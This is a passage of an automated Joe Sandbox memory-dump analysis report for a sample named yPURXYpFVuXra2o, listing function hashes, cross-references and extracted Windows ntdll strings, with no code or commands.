                                                                                                                                                                                                        • Instruction ID: cd905a45ffc16733c46da89ab747e586bb3ade95366697c241b8eeb19654a6b1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa9b7d87cd77c95c493a9843c75faa9dbc833784f572b76ffa7f6c79c66c5e74
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7313AB1A0020DAFDB10EF98DC84AEEBBBCEF54744F440469EA01EB241D7749F048BA4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • LdrpInitializeTls, xrefs: 01871851
                                                                                                                                                                                                        • minkernel\ntdll\ldrtls.c, xrefs: 0187185B
                                                                                                                                                                                                        • DLL "%wZ" has TLS information at %p, xrefs: 0187184A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                        • API String ID: 0-931879808
                                                                                                                                                                                                        • Opcode ID: 80ff20dfb4f278f751d630c1a4784620354e19a959acc169a0265f4b55f39c1d
                                                                                                                                                                                                        • Instruction ID: 2a3ca6832a20beacc56d0b7e1e5735bbfb0d83dfcbdeb99c4964ca9504138b0d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80ff20dfb4f278f751d630c1a4784620354e19a959acc169a0265f4b55f39c1d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F131F671A40205EBD7209B59CC89F6A7AA8FB94B54F09012DF606E71C0D770EF048BE0
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0184119B
                                                                                                                                                                                                        • BuildLabEx, xrefs: 0184122F
                                                                                                                                                                                                        • @, xrefs: 018411C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                        • API String ID: 0-3051831665
                                                                                                                                                                                                        • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                        • Instruction ID: 687fb164a1040cf195f0319503e52db39022ab9c06b8d0ef1908a4cecb449ab3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D53184B290061EBBDB11EB98DC44EAEBB7DEB94764F004025FA14E7250DB30DB458B91
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$@
                                                                                                                                                                                                        • API String ID: 0-149943524
                                                                                                                                                                                                        • Opcode ID: 548e6fedd83e0fa9db1cd71f82f89da5da8e04187ba401b9ddfbcb5e8c11f3d2
                                                                                                                                                                                                        • Instruction ID: 191c0b9d19561370a92b5bd05744b16ee854a6bd4818c865611abe324dbac050
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 548e6fedd83e0fa9db1cd71f82f89da5da8e04187ba401b9ddfbcb5e8c11f3d2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D328B725083518BD7248F19C480B7EBBE9EFCA714F14492EFA95C7294E734DA44CB92
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$AddD
                                                                                                                                                                                                        • API String ID: 0-2525844869
                                                                                                                                                                                                        • Opcode ID: e13a9bf736856d57572a961531b70e9fb47484b39e836332884305fc5276de84
                                                                                                                                                                                                        • Instruction ID: c352456bc5d7464e5c6b786dcf9ff6ab7e924ddc4d200d55688a266463b56db7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e13a9bf736856d57572a961531b70e9fb47484b39e836332884305fc5276de84
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65A16F72108345AFE315DF14C849F6BBBE9FB84714F144A2EFA94C6154EB70EA06CB52
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID: Legacy$UEFI
                                                                                                                                                                                                        • API String ID: 2994545307-634100481
                                                                                                                                                                                                        • Opcode ID: f6c69845c17fb7fe3743f52fe51d34d78f131539b7d636534492f127d03e4f2d
                                                                                                                                                                                                        • Instruction ID: 3ec7f6bdf5edbfaa6aba5871eaf73800df7b1c71e2ac3d8bcf9fb82613940872
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6c69845c17fb7fe3743f52fe51d34d78f131539b7d636534492f127d03e4f2d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70614D71A4061D9FDB25DFA8C880BADBBF9FB48704F14406DE649EB251E730EA40CB50
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • RedirectedKey, xrefs: 018DB60E
                                                                                                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 018DB5C4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                                                                        • API String ID: 0-1388552009
                                                                                                                                                                                                        • Opcode ID: 61daa475985bf2cf43af13ec345b3bb20a089e764fc46d442624285293f60139
                                                                                                                                                                                                        • Instruction ID: c64fd9be9f8b63dad1fbb87b0bcfb39ae5a07b12649db55b61fb1577f2ea0363
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61daa475985bf2cf43af13ec345b3bb20a089e764fc46d442624285293f60139
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 536106B5C0121DEBDB21DF94C889ADEBFB8FB09714F15806AE505E7204DB349A45CF90
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • kLsE, xrefs: 018005FE
                                                                                                                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01800586
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
• API ID:
• String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
• API String ID: 0-2547482624
• Opcode ID: 3b53f9e6411c3cf22995e9cb9450c5f3d661641c7f02616029565a1f782e1641
• Instruction ID: 48da97aa72ac858a2fe5a820ed1e4a33d557703ec30ba7abd52b696f43808f5e
• Opcode Fuzzy Hash: 3b53f9e6411c3cf22995e9cb9450c5f3d661641c7f02616029565a1f782e1641
• Instruction Fuzzy Hash: A651BC71A0074E9FDBA6DFA8C8407AAB7F4AF04344F10453EF69AD3281E6359744CB62
Strings
• RtlpResUltimateFallbackInfo Enter, xrefs: 0180A21B
• RtlpResUltimateFallbackInfo Exit, xrefs: 0180A229
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
• API String ID: 0-2876891731
• Opcode ID: 37844f7603cf10b583242b1627fcfaa5606cbdb741875e7c826b263f322ea668
• Instruction ID: 54934c67a4e02783b8c5310494b8c54b16aaa9e0c45ecdde73dfaad9f1434d7b
• Opcode Fuzzy Hash: 37844f7603cf10b583242b1627fcfaa5606cbdb741875e7c826b263f322ea668
• Instruction Fuzzy Hash: 7D41CC31A00759DBEB1ADF9DC840B6ABBB9FF85754F1440A5ED00DB2A1E636DB00CB11
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
• API String ID: 0-118005554
• Opcode ID: 9cb68183d93e6023c184e3beb4f67c298cb0ea06e2a63499c96cd23b1e5172f7
• Instruction ID: 70bc58e03db3a3cb817ec84e5b9bee5fc60275c1a33dc28280dc7c078572f8fe
• Opcode Fuzzy Hash: 9cb68183d93e6023c184e3beb4f67c298cb0ea06e2a63499c96cd23b1e5172f7
• Instruction Fuzzy Hash: 133190312087419BE715DBADD844B1ABBE8FF85714F0804A9FD64CB390EA31DA05C752
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: .Local\$@
• API String ID: 0-380025441
• Opcode ID: 0489491388c2e0fd889703859aa5e1d494516bfb1935fa3a7761ee21d59674ab
• Instruction ID: e812f1bb254b33d33786c84a0aebbc19094381bd74b04befdd947e379af4d692
• Opcode Fuzzy Hash: 0489491388c2e0fd889703859aa5e1d494516bfb1935fa3a7761ee21d59674ab
• Instruction Fuzzy Hash: C7313872549305AFD721DF28C880A6BBBE8BBC5754F04092EF995C3251D634DE04CBD2
Strings
• SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 0187289F
• RtlpInitializeAssemblyStorageMap, xrefs: 0187289A
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
• API String ID: 0-2653619699
• Opcode ID: 662c6d37d79150d116ac24c43fa6cc6c9d851c4839176ccebee38ec12a9c588a
• Instruction ID: fa928ebd38c92b50e0962f50b9b061410e8aadb23011f515b236bdba17bc5323
• Opcode Fuzzy Hash: 662c6d37d79150d116ac24c43fa6cc6c9d851c4839176ccebee38ec12a9c588a
• Instruction Fuzzy Hash: 6211CA76B00205ABE7169A4D8D81F6A7AE9EBD4714F1884297E04DB244D675DF0143E1
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Cleanup Group$Threadpool!
• API String ID: 2994545307-4008356553
• Opcode ID: 4c110da9cdcb43aa43e4a832c5c9abe730893dccbbda8399d7d61754fc7ad8ba
• Instruction ID: 542c0f6a9a9ade03cd1a96f39dd79b32a940322ad42da93551baa4e842edadce
• Opcode Fuzzy Hash: 4c110da9cdcb43aa43e4a832c5c9abe730893dccbbda8399d7d61754fc7ad8ba
• Instruction Fuzzy Hash: BE01D1B2254704AFD315DF54CD05F2277F8EB80B15F048939B698C75A0E738DA00CB86
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: GlobalTags
• API String ID: 0-1106856819
• Opcode ID: a944abc0688e34cf249a073d0b6fc15d9e8b12cfff97673d824a4230bd5d2cc2
• Instruction ID: 6245f5211e50c7f54938d0406caaea20f8e0aa500fdc9f303ca817b6daf9b4dd
• Opcode Fuzzy Hash: a944abc0688e34cf249a073d0b6fc15d9e8b12cfff97673d824a4230bd5d2cc2
• Instruction Fuzzy Hash: 84716D75E0061A9FEF28DF9CC580AEDBBB2BF48714F24812EE905E7245E7318A41DB50
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: #%u
• API String ID: 0-232158463
• Opcode ID: 791369bc4e4ece2144678e1c6d6438e09575f361c6c275061e647bbf92163b23
• Instruction ID: 8c1304d9ca0e48f623cd6954dc6b3814954587697f35981f14638084b764a759
• Opcode Fuzzy Hash: 791369bc4e4ece2144678e1c6d6438e09575f361c6c275061e647bbf92163b23
• Instruction Fuzzy Hash: A0714A72A0010A9FDB15DFA9D984BAEBBFCFF18704F144065E901E7255EA34EA41CB61
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
• Instruction ID: cbd1d489e0c9ddf2d97b005916ec629b06008f2468d591393068fc7c9a2f951e
• Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
• Instruction Fuzzy Hash: A3517D72504746AFE721EF58C940F6BB7E8FF94714F100929BA41D7290DB75EA04CBA2
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: EXT-
• API String ID: 0-1948896318
• Opcode ID: 6a44b54c4b46efd22db61baef2e10d75aaf635ca6d7a0fa841276fa219e48167
• Instruction ID: baccc4d9ca61ca0160d16f41021494c211bf0965e32c7b191831b7df6260403f
• Opcode Fuzzy Hash: 6a44b54c4b46efd22db61baef2e10d75aaf635ca6d7a0fa841276fa219e48167
• Instruction Fuzzy Hash: 6941A0735083169BD722DA69C844B6BB7ECAF88B18F440E2DFA84D7184E674DB04C793
Strings
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
• Instruction ID: 81cc4116b39e450579aec0c2477f5dca0ca3b35a39ecaecf9f139c649929af16
• Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
• Instruction Fuzzy Hash: 6C516A725047119BC320DF59C841A6BBBE9FF88710F00892AFA95D76A1E774EA04CB92
Strings
Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: BinaryHash
                                                                                                                                                                                                        • API String ID: 0-2202222882
                                                                                                                                                                                                        • Opcode ID: 176f09550d35322184667b363b15bcb1b347950b2fd848b5127dfc9bf3d06ea6
                                                                                                                                                                                                        • Instruction ID: 5b1c54f3c238b253df2488f22262940d2d8483fc3627108a6fd1bbc1dff5f7cc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 176f09550d35322184667b363b15bcb1b347950b2fd848b5127dfc9bf3d06ea6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E4122B190052EABDB21DA94CC85FDEB77DAB54714F0045E5EB08E7141DB309F888FA5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: verifier.dll
                                                                                                                                                                                                        • API String ID: 0-3265496382
                                                                                                                                                                                                        • Opcode ID: 70b7d80f8aa5e00d6eb12692df9cc79ae54e9f162985fabc45cb5aa34c28ee68
                                                                                                                                                                                                        • Instruction ID: 1cfa3bf4e1f505249201c976493f8234f00732d297db22a8b1aa183aa2b165a7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70b7d80f8aa5e00d6eb12692df9cc79ae54e9f162985fabc45cb5aa34c28ee68
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B31A575B006069FEB34AF5CD890B3677E5EBC8318F94846DF609DF286E6318E808760
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: #
                                                                                                                                                                                                        • API String ID: 0-1885708031
                                                                                                                                                                                                        • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                                                                                                        • Instruction ID: 1541a55d265ccb9906dc29f0db3596a198d0c18ed6325fe9d59087be88087f40
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02419DB5A0061A9BCF25DF88C880BBEBBB5FF85705F04449AE945E7241D734EA41CBD1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 018885DE
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                        • API String ID: 0-702105204
                                                                                                                                                                                                        • Opcode ID: bdd20370910ee8508532b02369a45f16f563bea4961bd8f3e5457ff7a38ca8ba
                                                                                                                                                                                                        • Instruction ID: 7b12f2ed626ec5baa417b642c1bb30770b5aa9eb1afce0fd9c457bc7b359a0e9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bdd20370910ee8508532b02369a45f16f563bea4961bd8f3e5457ff7a38ca8ba
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A001F23A6002059BE631BB59D88CE667F65EF46758F84052CF702D7597CB20AB80CBA5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 036c1942db91715b04ed9c6fed1adee23b52d2950b9432872a6ee52b70f77157
                                                                                                                                                                                                        • Instruction ID: 060d040ae8c51e10478b09afb9e535fae3d11adf81614d86a7931b8df8514bf7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 036c1942db91715b04ed9c6fed1adee23b52d2950b9432872a6ee52b70f77157
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3142B271A006168FDB59CF5DC4809AEBBB2FF88314B54C55DE952EB341D734EA42CBA0
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 347c5b0956c9feead77ac5e8d5550603510425d1fae78d528125c9ef88bda315
                                                                                                                                                                                                        • Instruction ID: b9c7fb43422cba23de425618d523037cd756e615b689566b192e7a00edff1d3c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 347c5b0956c9feead77ac5e8d5550603510425d1fae78d528125c9ef88bda315
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8332C075E01229DBDF25DFA8C884BAEBBB1FF54704F180129E905EB390E7359A41CB90
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: e9485395877286fd4d466f0d747eb278cf50e7cb13686fe59501e0e096646eef
                                                                                                                                                                                                        • Instruction ID: 844b6dff4aa76da696ccc936e221ee5f916690f8b15894ef40d04596d2320824
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9485395877286fd4d466f0d747eb278cf50e7cb13686fe59501e0e096646eef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD228035A00216CFDB19CF58C4D4AAAB7B2FF89B14F18816DD955DB346DB30EA41CB90
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 09a642efe9e3ed99f9806569e7e68ccf36b41a08e008c61bab59f9fbc733939a
                                                                                                                                                                                                        • Instruction ID: ddffb3797d6f1b7d73169fd7237db4dec8fff392119b330e629e7fdb27bc0803
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09a642efe9e3ed99f9806569e7e68ccf36b41a08e008c61bab59f9fbc733939a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4DE19F715083468FC756CF28C890A2ABBE1FF89318F14496DF595C7391EB31EA15CB92
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 92679bb5253a42ab0963ab4b6c4b0c129b4e3ae8de45a309e4a31ac0494b0128
                                                                                                                                                                                                        • Instruction ID: d71ca8b502a71d88dc29799bfde124e67125f2bac743ae6ff11d449730fd2ecf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92679bb5253a42ab0963ab4b6c4b0c129b4e3ae8de45a309e4a31ac0494b0128
• Instruction Fuzzy Hash: 37D1C27160020A9BDB14DF68C880BBBBBA6FF64304F08416DEE11DB395EB34DA55CB61
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c61a67e9a386ca1c890a52fb7bdbd16eae8a5f915cacf32373b95d8a670751a9
• Instruction ID: b1623d1315ada55220ab5b56eed31be344baf798da6e408e0d37dedc3c00b748
• Opcode Fuzzy Hash: c61a67e9a386ca1c890a52fb7bdbd16eae8a5f915cacf32373b95d8a670751a9
• Instruction Fuzzy Hash: B6C19571A0021A9BDB25CF9DC840BAEBBB6FF44314F148659E959EB2C1D770EB41CB90
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5dfd93621dfd5f7c5b902ce0e7ef8b75cea50b5783b8f0959614892b873d2565
• Instruction ID: 951cf12ef229824f0ab4da3383c25314b91929a1f247469358918c1d135f96dc
• Opcode Fuzzy Hash: 5dfd93621dfd5f7c5b902ce0e7ef8b75cea50b5783b8f0959614892b873d2565
• Instruction Fuzzy Hash: 2CC10472A00125CBDB25CF1CC490BB97BA9FB48718F194199EE46DB39AE7348B45CB60
Memory Dump Source
• Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1bdf9572245323a7adf3447237cf4441e6a7398a8b05e05178db24eb6adb7a0b
• Instruction ID: 0aae0e76b97e461388090e8334e290980852cba62fd642d0b55bf62c4cad0e40
• Opcode Fuzzy Hash: 1bdf9572245323a7adf3447237cf4441e6a7398a8b05e05178db24eb6adb7a0b
